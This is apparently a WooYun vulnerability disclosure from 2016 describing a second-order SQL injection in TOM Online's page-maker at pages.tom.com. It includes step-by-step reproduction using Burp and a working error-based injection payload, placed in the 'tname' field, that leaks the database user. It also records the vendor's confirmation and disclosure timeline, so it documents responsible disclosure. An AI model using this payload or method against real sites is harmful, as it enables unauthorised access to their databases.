TOM在线某处二次SQL注入

编号209050
Urlhttp://www.wooyun.org/bug.php?action=view&id=209050
漏洞状态厂商已经确认
漏洞标题TOM在线某处二次SQL注入
漏洞类型SQL注射漏洞
厂商TOM在线
白帽子Sunshie
提交日期2016-05-16 09:31:00
公开日期2016-07-01 10:20:00
修复时间(not set)
确认时间2016-05-17 00:00:00
Confirm Spend1
漏洞标签注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
tom在线复活了?
漏洞细节

首先注册个账号登录:http://pages.tom.com/make/manage.php
然后创建一个页面

1.jpg


这里随便填然后提交,然后访问http://pages.tom.com/make/manage.php 点修改创建信息

2.jpg


到了这里开启burp拦截数据包

3.jpg


然后把tname修改为:

11111',userid=(select (1) from qa_data_topic where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b))/**


4.jpg


提交后 来到http://pages.tom.com/make/manage.php,然后点提交审核

shenhe.jpg


5.jpg


成功注入出数据库用户

POC

5.jpg

修复方案

状态信息 2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开
厂商回复已经通知相关技术人员处理,非常感谢。
回应信息危害等级:中漏洞Rank:10 确认时间:2016-05-17 10:10